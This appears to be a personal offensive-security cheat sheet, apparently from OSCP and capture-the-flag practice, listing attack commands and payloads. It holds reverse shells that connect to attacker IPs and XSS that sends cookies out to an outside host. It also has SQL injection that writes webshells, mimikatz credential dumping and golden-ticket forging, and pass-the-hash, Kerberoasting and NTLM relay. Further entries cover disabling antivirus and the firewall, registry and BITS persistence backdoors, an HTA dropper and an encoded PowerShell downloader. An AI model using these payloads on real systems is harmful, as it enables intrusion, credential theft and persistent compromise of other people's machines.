arsenals

[OSCP Notes]
https://github.com/tbowman01/OSCP-PWK-Notes-Public

[Windows Kernel Exploit]
https://github.com/SecWiki/windows-kernel-exploits
https://github.com/abatchy17/WindowsExploits

[Asterisk pwfeedback Exploit]
https://raw.githubusercontent.com/saleemrashid/sudo-cve-2019-18634/master/exploit.c

[smbmap]
smbmap -H 10.10.10.10 -u aniq -p 'password'
smbmap -H 10.200.3.219 -u administrator -p 'aad3b435b51404eeaad3b435b51404ee:a06e58d15a2585235d18598788b8147a'

[tar wildcard]
https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/

[sql injection cheat sheet]
https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/

[sql trucation attack]
https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html

[sql bypass characters exfiltration]
'+UNION+SELECT+char(60,63,112,104,112,32,115,121,115,116,101,109,40,36,95,71,69,84,91,39,99,109,100,39,93,63,62),null+into+outfile+'/var/www/html/shell.phtml'-- -

[windows priv esc]
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#sam-and-system-files

[filetransfer]
	[[netcat]]
	nc -l -p 1234 > out.file (receiving)
	nc -w 3 [destination] 1234 < out.file (sender)

	[[python]]
	python -m SimpleHTTPServer
	wget [url]

[Rejetto HFS: RCE]
http://172.31.1.24/?search=%00{.exec|certutil.exe%20-urlcache%20-f%20http://10.10.0.84/ch4rm.exe%20C:\Users\Public\ch4rm.exe.}

[POP3 server command]
https://www.shellhacks.com/retrieve-email-pop3-server-command-line/

[Hydra brute types]
https://redteamtutorials.com/2018/10/25/hydra-brute-force-techniques/

[rdp bruteforce credentials]
ncrack -vv --user offsec -P passwords rdp://target

[upload nc.exe to windows]
https://d47zm3.me/resources/infosec/reverse-shells/

[ldapsearch]
ldapsearch -LLL -x -H ldap://<domain fqdn> -b ‘’ -s base ‘(objectclass=*)’
ldapsearch -x -h 10.10.10.161 -D 'htb\svc-alfresco' -w 's3rvice' -b 'CN=Users,DC=HTB,DC=LOCAL'

[ad-ldap-enum]
ad-ldap-enum.py -l 10.10.10.10 -d domain.local

[escape rbash]
ssh user@10.10.10.51 sh

[sshutle]
sshuttle -vr sshuser@10.10.110.74 192.168.20.0/24

[autosolve crypto]
https://scwf.dima.ninja/

[jwt]
https://medium.com/swlh/hacking-json-web-tokens-jwts-9122efe91e4a

[imap]
https://book.hacktricks.xyz/pentesting/pentesting-imap

[nishang reverse shell]
powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.19/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.19 -Port 1337

[xss payloads]
* keylogger
http://www.xss-payloads.com/payloads/scripts/simplekeylogger.js.html
* port scanning
http://www.xss-payloads.com/payloads/scripts/portscanapi.js.html

[juicy potato]
jp64.exe -t * -p C:\Windows\system32\cmd.exe -a "/c C:\Windows\Temp\charm.exe" -l 33333

[wordpress password hash generator]
http://www.passwordtool.hu/wordpress-password-hash-generator-v3-v4

[msfvenom cheatsheet]
https://burmat.gitbook.io/security/hacking/msfvenom-cheetsheet

[socat port forward]
socat tcp-listen:8888,reuseaddr,fork tcp:localhost:22

[shellshock cmd]
https://github.com/opsxcq/exploit-CVE-2014-6271
> curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://172.31.1.3/cgi-bin/test.cgi

[windows:secretsdump]
secretsdump.py -sam SAM -system SYSTEM LOCAL
secretsdump.py -just-dc hololive.local/DC01\$@10.10.225.71
# DCSync
secretsdump.py THROWBACK.local/jeffersd:Throwback2020@10.200.3.117 -dc-ip 10.200.3.117

[xfreerdp]
xfreerdp /v:10.10.10.10 /u:admin /p:password
xfreerdp /v:10.10.10.10 /u:administrator /pth:'NTLM'

[winexe]
winexe -U 'administrator' //10.10.10.10 'cmd.exe'

[certuril]
certutil -URLCache -f http://10.8.2.121:9005/setup.msi  c:\Temp\setup.msi

[service enumeration]
# check the service privilege
$ services
## can you modify any service?
$ cmd /c 'sc config <service> binpath="C:\test.exe"'
## can you modify any binary that is executed by any services?
$ icacls services\monitor1.exe
	if yes
	# can we start the service?
	$ cmd /c 'sc sdshow monitor1'

[tomcat curl upload]
curl -u 'tomcat:$3cureP4s5w0rd123!' --upload-file hehe.war http://10.10.10.194:8080/manager/text/deploy?path=/application

[shellshock]
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://10.10.10.10

[PowerUp.ps1]
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

[git]
• git status
• git log
• git log -p -1
• git branch
• git branch -r
• git checkout dev
• git tag
   ◇ git show <tagname>
       contoh => 06fbefc1da56b8d552cfa299924097ba1213dd93
• git add <file>
• git commit -m “Add”
• git push

[sqli union select payloads]
1. database()
2. user()
3. @@version
4. username
5. password
6. table_name
7. column_name

[kerberos cheatsheet]
https://github.com/nidem/kerberoast

[kerbrute]
## userenum
kerbrute userenum -d spookysec.local --dc AttacktiveDirectory.spookysec.local users.txt
## bruteuser
kerbrute bruteuser -d spookysec.loccal --dc 172.0.0.1 passwords.txt <user>

[getNPuser.py]
python3 getNPusers.py spookysec.local/ -no-pass -usersfile users.txt -request
# to get TGT: AsREP attack

[getUserSPNs.py]
# requirements: need credentials
python3 getUserSPNs.py spookysec.local/user:password -dc-ip 172.0.0.1 -request 
# to get TGS: Kerberoasting

[rejetto rce]
http://172.31.1.24/?search=%00{.exec|certutil.exe%20-urlcache%20-f%20http://10.10.0.84/ch4rm.exe%20C:\Users\Public\ch4rm.exe.}

[psexec]
psexec.py -hashes LM:NTLM administrator@10.200.200.127
psexec.py domain/username:password@10.10.10.10

[wmiexec]
wmiexec.py -hashes LM:NTLM administrator@10.10.10.10

[XHR Requests]
```
var r = new XMLHttpRequest();

s = localStorage()
for (i in s){
	r =open("GET","http://10.10.14.14/?"+i,true);
	r.send();
}
```

[LM empty string]
aad3b435b51404eeaad3b435b51404ee

[nikto cheatsheet]
https://redteamtutorials.com/2018/10/24/nikto-cheatsheet/

[sqsh:mssql connect]
sqsh -S 172.16.1.5 -U sophie -P 'TerrorInflictPurpleDirt996655'

[mysql: read file]
select load_file('/tmp/data.blob')

[mysql: user defined function]
https://redteamnation.com/mysql-user-defined-functions/
https://www.facebook.com/watch/?v=2060455820930493

[mysql: boolean]
' or length(database())='2'-- -
' or substring(database(), 2,1)="a"-- -
' or substring(database()) like "%a%'-- -
' or substring(select table_name from information_schema.tables where table_schema=database(), 1, 1) = "a"-- -
' or substring(select table_column from information_schema.columns where table_schema=database() and table_name='users' 1, 1) = "a"-- -

[ldap: dse namingcontexts search]
ldapsearch -h 172.31.3.9 -x -s base namingcontexts

[ldap: subtree query]
ldapsearch -h 172.31.3.9 -x -b 'DC=spray,DC=csl' -s sub

[asterisk password vuln]
https://raw.githubusercontent.com/saleemrashid/sudo-cve-2019-18634/master/exploit.c

[mimikatz: general]
privilege::debug
log
log customlogfilename.log


[mimikatz: sekurlsa]
sekurlsa::logonpasswords
sekurlsa::logonPasswords full
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

[mimikatz: kerberos]
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

[mimikatz: crypto]
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
crypto::keys /machine /export

[mimikatz: vault/lsadump]
vault::cred
vault::list
token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
lsadump::dcsync /user:domain\krbtgt /domain:lab.local

[mimikatz: ptt]
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a
sekurlsa::pth /user:Administrateur /domain:chocolate.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe

[mimikatz: ekeys]
sekurlsa::ekeys

[mimikatz: dpapi]
sekurlsa::dpapi

[mimikatz: minidump]
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords

[mimikatz: ptt]
kerberos::ptt Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi

[mimikatz: golden/silver]
kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi
kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:Administrateur /id:500 /groups:513,512,520,518,519 /ptt /startoffset:-10 /endin:600 /renewmax:10080
kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi

[mimikatz: tgt]
kerberos::tgt

[mimikatz: purge]
kerberos::purge

[grep: recursive]
grep -Hnri "One Piece" /home /usr 2>/dev/null

[ad-ldap-enum]
python ad-ldap-enum.py -l 10.10.10.169 -d megabank.local

[asterisk call manager: login]
Action:login
Username:admin
Secret:abc123

[asterisk call manager: enumerate users]
action: command
command: sip show users

[java decompyle]
jad file.class

[rpc: change password]
https://malicious.link/post/2017/reset-ad-user-password-with-linux/
> setuserinfo2 audit2020 23 password123

[kerberos: getUserSpn]
GetUserSPNs.py roast.csl/dsmith:WelcomeToR04st -dc-ip 172.31.3.2 -request

[kerberos: GetNPUsers]
GetNPUsers.py roast.csl/ -dc-ip 10.10.10.10 -no-pass -usersfile users

[smb with hash]
smbclient.py -hashes aad3b435b51404eeaad3b435b51404ee:0ce1cb01ade331cdba32d0e1fba338a1 ADMIN.offshore.com/bankvault@172.16.4.31
smbclient.py CORE.cyber.local/george.wirth:'v765#QLm^8'@10.9.10.10 -dc-ip 10.9.10.10
smbmap -H 172.16.4.31 -u bankvault -p aad3b435b51404eeaad3b435b51404ee:0ce1cb01ade331cdba32d0e1fba338a1 -d ADMIN.offshore.com

[Impoersonate_tokens: PrintSpoofer]
PrintSpoofer.exe -i -c cmd

[Check unquoted path]
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "C:\windows\\" |findstr /i /v """

[DLL Hijacking]
* msfvenom -p windows/shell_reverse_tcp LHOST=10.10.0.84 LPORT=1337 -f dll -o Customs.dll
* sc qc <service> # check service 
* icacls  #check permission on currentdirectory
* sc start <service>

[disable windows AV]
powershell Set-MpPreference -DisableRealtimeMonitoring $true

[disable windows firewall]
# cmd
netsh advfirewall set allprofiles state off
# powershell
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False

[dll hijacking]
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.68.111 LPORT=53 -f dll -o plugin.dll
smbserver.py SHARE `pwd`
dnscmd.exe myserver.local /config /serverlevelplugindll \\10.211.55.13\share\plugin.dll

[hashcat rules]
hashcat -m 5600 -r /opt/OneRuleToRuleThemAll.rule hash /opt/rockyou.txt

[nodejs reverse shell]
require('child_process').exec('bash -i >& /dev/tcp/10.0.0.1/80 0>&1');

[ld.so privesc]
> ldd <file>
https://book.hacktricks.xyz/linux-unix/privilege-escalation/ld.so.conf-example
https://www.boiteaklou.fr/Abusing-Shared-Libraries.html

[persistence: add registry key]
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Users\tryhackme\AppData\Roaming"

[persistence: bitsadmin]
bitsadmin /create backdoor
bitsadmin /addfile backdoor "http://10.11.11.36/backdoor.exe" "C:\Users\tryhackme\Documents\backdoor.exe"
bitsadmin /SetNotifyCmdLine 1 cmd.exe "/c bitsadmin.exe /complete backdoor | start /B C:\Users\tryhackme\Documents\backdoor.exe"
bitsadmin /SetMinRetryDelay backdoor 15
bitsadmin /resume backdoor

[persistence: edit registry key]
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, <PATH_TO_BINARY>" /f

[persistence: add admins user]
net user ch4rm P@$$w0rd /add 
net localgroup administrators ch4rm /add

[crackmapexec/cme]
crackmapexec smb 10.10.10.10 -u aniq -p pass.txt
crackmapexec smb 10.200.3.1/24 -u administrator -d domain.local -H 'NTLM'
crackmapexec smb 172.16.1.101 -u wsadmin -H '669b12a3bac275251170afbe2c5de8c2' -x 'whoami'
crackmapexec smb 10.10.110.24 -u wsadmin -H '00000000000000000000000000000000' --sam
crackmapexec smb 10.10.10.14 -u salvador -p "password" --shares --pass-pol
crackmapexec winrm ./targets.txt -u dummy -p 'P!@$$w0rd!' 
#more cheatsheets
https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec-cheatsheet/

[xss bypass]
<SCRscriptIPT>document.location='http://10.14.3.113/ape.js?c='+document.cookie</SCRscriptIPT>
<SCRscriptIPT>new Image().src="http://localhost/cookie.php?c="+document.cookie;</SCRscriptIPT>
#make sure to use html entities

[storred xss: embed register form]
# 1st method (POST)
```
<script>
var xhr = new XMLHttpRequest();
xhr.open('POST','/gigantic/register.php',true);
xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xhr.onload=function(){
	console.log(this.responseText);
}

xhr.send('username=ch4rm&password=password&set_admin=admin&action=Register');
</script>
```
#2nd method (GET)
```
<form action="http://172.30.68.55/register.php" name="yo" method="POST">
<input type="hidden" name="username" id="username" value="ch4rm">
<input type="hidden" name="password" id="password" value="password">
<input type="hidden" name="kid" value="ch4rm">
<input type="hidden" name="set_admin" value="admin">
</form>
<script>document.yo.submit();</script>
```

[bypass space]
IFS=,;`cat<<<cat,/etc/passwd`
cat$IFS/etc/passwd
cat${IFS}/etc/passwd
cat</etc/passwd                 
{cat,/etc/passwd} OR {ls,-las,/var} with args
X=$'cat\x20/etc/passwd'&&$X

[docker security]
# restart if crash
/usr/bin/docker container run --detach --privileged --restart=unless-stopped -p 8080:8080 --mount type=bind,source="/home/zac/notes",target=/home/zac/notes https
# mount root directory to mnt using docker api
docker -H tcp://10.10.25.34:2375 run -v /:/mnt --rm -it alpine:3.9 chroot /mnt sh
# mount root directory to mnt using socker daemon
./docker -H unix:///tmp/docker.sock run -v /:/mnt --rm -it alpine chroot /mnt sh
# using docker socket with curl
https://betterprogramming.pub/about-var-run-docker-sock-3bfd276e12fd

[mounting shares]
mount -f cifs '//172.16.1.31/Shares' mnt/
mount -o vers=3 -t nfs 10.10.10.10:/home/mark mnt

[attach tmux socket]
tmux -S .details attach

[hydra: json]
hydra -l admin@e-shopping-cart.com -P wordlistts.txt 192.95.148.3 http-post-form '/validate-otp:{\"email\"\:\"^USER^\",\"password\"\:\"pass\",\"otp\"\:\"^PASS^\"}:Error' -s 8080 -V
hydra -l admin -P /opt/rockyou.txt management.escobar.hmv http-post-form '/api/login:{"username"\:"^USER^","password"\:"^PASS^","recaptcha"\:""}:Forbidden' -V -f

[snmp enumeration]
snmpwalk -v1 -c public 192.168.68.108
nmap --script "snmp* and not snmp-brute" -p 161 -sU 192.168.68.108
snmpwalk -v3 -a SHA -A STrP@SSWRD -x AES -X STr0ngP@SSWRD -l authPriv -u snmpadmin localhost | head

[udp reverse shell]
# listening
nc.traditional -ulvnp 1337
# attacker
bash -i >& /dev/udp/127.0.0.1/4242 0>&1

[sqli: boolean based sql injection]
1. 0 or length(database())="6"
# get the database name letters by letters
2. 0 or substring(database(),1,1)='d'
2.1 0 or substring(database(),2,1)='a'
# get the database name letter sby letters using `like`
3. 0 or database() like '%a%'
3.1 0 or database() like 'a%'
3.2 0 or databasE() like 'd__k'
' or (select (ascii(substr((select database()), 1, 1))) = 104)-- -
' or (select (ascii(substr((select table_name from information_schema.tables where table_schema=database()), 1, 1))) = 104)-- -
' or (select (ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='user'), 1, 1))) = 104)-- -
# command injection in sqli
/ping?id=3995 UNION SELECT 1,'|ping 10.4.0.68'-- -

[sql read and write]
SELECT * FROM mytable INTO dumpfile '/tmp/somefile'
SELECT 'system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php'
SELECT LOAD_FILE('/etc/passwd')
SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
SELECT file_priv FROM mysql.user WHERE user = 'netspi'
SELECT grantee, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%netspi%'
#reference: https://sqlwiki.netspi.com/attackQueries/readingAndWritingFiles/#mysql

[stored credentials on windows]
cmdkey /list

[run as another user windows]
runas /savecred /user:admin-petersj /profile cmd.exe

[evil-winrm]
evil-winrm -i 10.200.3.219 -u administrator -H 'a06e58d15a2585235d18598788b8147a
evil-winrm -i 10.200.3.219 -u administrator -p 'password'

[stegcloack]
https://stegcloak.surge.sh/

[reverse shell]
* ssti
```
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('bash -c "bash -i >& /dev/tcp/192.168.0.143/9001 0>&1"')|attr('read')()}}
```

* java
```
import java.io.BufferedReader;
import java.io.InputStreamReader;

public class testprog {
    public static void main(String args[]) {
        String s;
        Process p;
        try {
            p = Runtime.getRuntime().exec("bash -c $@|bash 0 echo bash -i >& /dev/tcp/192.168.0.143/9002 0>&1");
            p.waitFor();
            p.destroy();
        } catch (Exception e) {}
    }
}
```

* jenkins#1
```
def command = "whoami"
def proc = command.execute()
println(proc.in.text)
```
* jenkins#2
```
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/4242;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```

[ld preload privilege escalation]
```
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}
```
> gcc -fPIC -shared -o shell.so shell.c -nostartfiles
> sudo LD_PRELOAD=/tmp/shell.so find

[java command execution]
```
import java.io.BufferedReader;
import java.io.InputStreamReader;

public class testprog {
    public static void main(String args[]) {
        String s;
        Process p;
        try {
            p = Runtime.getRuntime().exec("ls -la");
            BufferedReader br = new BufferedReader(
                new InputStreamReader(p.getInputStream()));
            while ((s = br.readLine()) != null)
                System.out.println("line: " + s);
            p.waitFor();
            System.out.println ("exit: " + p.exitValue());
        } catch (Exception e) {}
    }
}
```

[BloodHound]
* upload SharpHound.ps1
* getting the loot
Invoke-Bloodhound -CollectionMethod All -Domain THROWBACK.local -ZipFileName loot.zip 
* start the server
neo4j:root

[docker breakout]
* use external docker.dock
docker -H unix:///tmp/docker.sock run -v /:/mnt --rm -it alpine chroot /mnt sh
* sys_module capabilities
https://blog.pentesteracademy.com/abusing-sys-module-capability-to-perform-docker-container-breakout-cf5c29956edd

[splunk webshell]
* splunk shell
https://github.com/TBGSecurity/splunk_shells
* POC
https://www.n00py.io/2018/10/popping-shells-on-splunk/

[responder]
# LLMNR Poisoning
responder -I tun0 -rdwv
# SCF Attack
responder -wrf --lm -v -I tun0

[wpscan]
* enumerate user and plugins(passive)
wpscan --url http://10.10.10.10 -e u,ap
* plugin aggresive scan
wpscan --url http://10.10.10.10 -e u,ap --plugins-detection aggressive

[imagemagick]
* save this in exploit.mvg
```
push graphic-context 
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|mknod /tmp/pipez p;/bin/sh 0</tmp/pipez|nc 192.168.68.114 4444 1>/tmp/pipez;rm -rf "/tmp/pipez)'
pop graphic-context
```
* setup a listener and execute convert binary
convert exploit.mvg exploit.png

[2to3-2.7 privilege escalation]
sudo 2to3-2.7 -w -n light.py --output=/root/script

[hta payload]
#Save as something.hta and send to victim
```
<script %00 >
    lets=ActiveXObject;
    ScTyp="WScript"
    home=ScTyp + ".Shell"
    gg=new lets(home);
    gg.run('%windir%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -exec bypass -C "wget http://10.10.10.10/help.exe -outfile C:\\Windows\\Tasks\\gg.exe;C:\\Windows\\Tasks\\gg.exe"' , 0);window.close();
</script %00 >
```

[ln symlink privilege escalation]
* create malicious bash file containing reverse shell in a writable directory (e.g. /tmp)
> sudo ln -sf /tmp/ln /usr/bin/ln
* the file now being redirected to malicious binary
> sudo /usr/bin/ln

```
[Command stablise shell that don't have python:]

    `$ script -qc /bin/bash /dev/null`
for python;
    `$ python -c "import pty;pty.spawn('/bin/bash')"` 

[command to get only 6 character in wordlist;]

`$ grep -x '[a-z0-9]\{6\}' /usr/share/wordlists/fasttrack.txt`

[Command to stabilise the shell;]

- In reverse shell, hit `CTRL + Z` to background
- Then, `$ stty raw -echo`
- Then, type `fg` and hit `enter` twice until it back to reverse shell;

[Command to make shell can be CLEAR;]

 `$ export TERM=xterm`

[Json Brute Force]
python3 jsonbrute.py --url http://management.test.local/api/login --wordlist rockyou.txt --data "username=admin, password=FUZZ, recaptcha= " --code 200 --verbose
#https://github.com/Jake-Ruston/JSONBrute

[hping3 file transfer8]
# sender
/usr/sbin/hping3 -1 127.0.0.1 -e signature -E /etc/shadow -d 500
# listener
/usr/sbin/hping3 -1 127.0.0.1 -9 signature -I lo

[sqlmap]
# enter specific parameter
-p username,password
# view privilege
--privilege
# enter os command/upload webshell
--os-shell
# write file
sqlmap -u 'http://example.com/?username=admin' --dbs --level 4 --risk 3 --file-write shell.php --file-dest '/var/www/html/shell.php'
# dump database
sqlmap -u 'http://10.10.110.124/login.php?username=admin&password=admin' --dbs --batch --level 4 --risk 3
# with Basic Authentication
sqlmap -u 'http://10.10.110.124/login' --form --dbs --batch --level 4 --risk 3 --headers="Authorization: Basic c3ZjX2lpczpWaW50YWdlIQ==

[swaks]
swaks --to admin@openmailbox.xyz --from david@openmailbox.xyz --header 'Subject: RESET MY PASSWORD 201324' --body 'Please reset my password' --server openmailbox.xyz

[lfi:php fileststem attack vectors]
Reference: https://www.ush.it/2009/02/08/php-filesystem-attack-vectors/
```
# null bytes at the end to avoid extensions
../../../var/log/something.log%00
# avoid black listed extensions or words
ciccio.php/.
ciccio.php/
# alternative
' and die(show_source("/etc/passwd")) or '
encoded: '%20and%20die(show_source(%22/etc/passwd%22))%20or%20'
' and die(system("curl http://192.168.68.108/revshell.php|php")) or '
```

[redis-cli]
# check info
info
# select db
select <index>
# select available keys
keys *
# view items
get <item>

[bypassing cheatsheet]
https://github.com/w181496/Web-CTF-Cheatsheet/blob/master/README.md

[dns | dig]
dig axfr @192.168.0.102 webmaster.htb
dig any @192.168.0.102 webmaster.htb

[accesschk.exe]
# check service permission to the user
accesschk.exe /accepteula -uwcqv user <service>
# check service with unquoted path
accesschk.exe /accepteula -ucqv user unquotedsvc
# check writable path
accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service"

[AD Module]
# GET ad user
Get-ADUser -Identity asalam
# Get users right 
(get-acl "AD:\CN=Ahmad Salam,CN=Users,DC=CH4RM,DC=local").access | select identityreference,activedirectoryrights

[PowerView]
# List all domain user
Get-DomainUser
# List all group members
Get-DomainGroup *admin* -Properties samaccountname | Get-DomainGroupMember

[scf attack]
```
[Shell]
IconFile=\\10.10.14.12\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop
```
* upload it to the target shares and run responder
responder.py -wrf --ln -v -I tun0

[ps credential]
$username = 'CORP.local\cleark'
$password = convertto-securestring -Force -AsPlainText "P@$$w0rd!"
$cred = New-Object System.Management.Automation.PSCredential($username,$password)

[PSDrive]
New-PSDrive -Credential $cred -PSProvider FileSystem -Name ch4rm \\10.10.10.10\C$

[powerupsql]
# cheatsheet
https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet
# enable xp_cmdshell
Get-SQLQuery -Query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "m3sqlw.m3c.local"'
# execute command
Get-SQLQuery -Query 'EXECUTE(''xp_cmdshell ''''whoami'''''') AT "m3sqlw.m3c.local"'

[pivoting: chisel]
#listen 
./chisel server -p 8001 --reverse
#remote 
./chisel client 10.10.10.10:8001 R:1080:socks

[limit rate bypass]
X-Forwarded-For : IP
X-Forwarded-Host : IP
X-Client-IP : IP
X-Remote-IP : IP
X-Remote-Addr : IP
X-Host : IP

[Hacking Python]
https://medium.com/swlh/hacking-python-applications-5d4cd541b3f1

[NTLM Relay]
# if you cant crack the NTLMv2 hash, then relay it!
* turn off http,smb in /etc/Responder.conf
Responder -I tun0 -rdvw
* Create a targets.txt containing list of targets ip (i.e. all://10.10.10.10)
ntlmrelayx.py -tf targets.txt -sm3support

[beacon: vbs script]
* Generate VBS script on CS
* generate this command and encode with utf-16le
echo "Invoke-WebRequest -Uri 'http://10.10.14.3:8000/apt.vbs' -OutFile 'C:\Windows\Tasks\apt.vbs';wscript.exe C:\Windows\Tasks\apt.vbs" | iconv utf-16le | base64
* run in remote
powershell.exe -nop -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACcAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADQALgAzADoAOAAwADAAMAAvAGEAcAB0AC4AdgBiAHMAJwAgAC0ATwB1AHQARgBpAGwAZQAgACcAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAYQBzAGsAcwBcAGEAcAB0AC4AdgBiAHMAJwA7AHcAcwBjAHIAaQBwAHQALgBlAHgAZQAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXABhAHAAdAAuAHYAYgBzAA==

[vnc crack]
https://github.com/jeroennijhof/vncpwd
vncpwd <vnc password file>

[ansible crack]
# crack with ansible2john if needed, make sure to preserver new lines"\n"
# method 1
echo '$ANSIBLE_VAULT;1.1;AES256
36643662303931336362356361373334663632343139383832626130636237333134373034326565
3736626632306265393565653338356138626433333339310a323832663233316666353764373733
30613239313731653932323536303537623362653464376365383963373366336335656635666637
3238313530643164320a336337303734303930303163326235623834383337343363326461653162
33353861663464313866353330376566346636303334353732383564633263373862' | ansible-vault decrypt && echo
# method 2 
ansible-vault view --ask-vault-pass encrypted.txt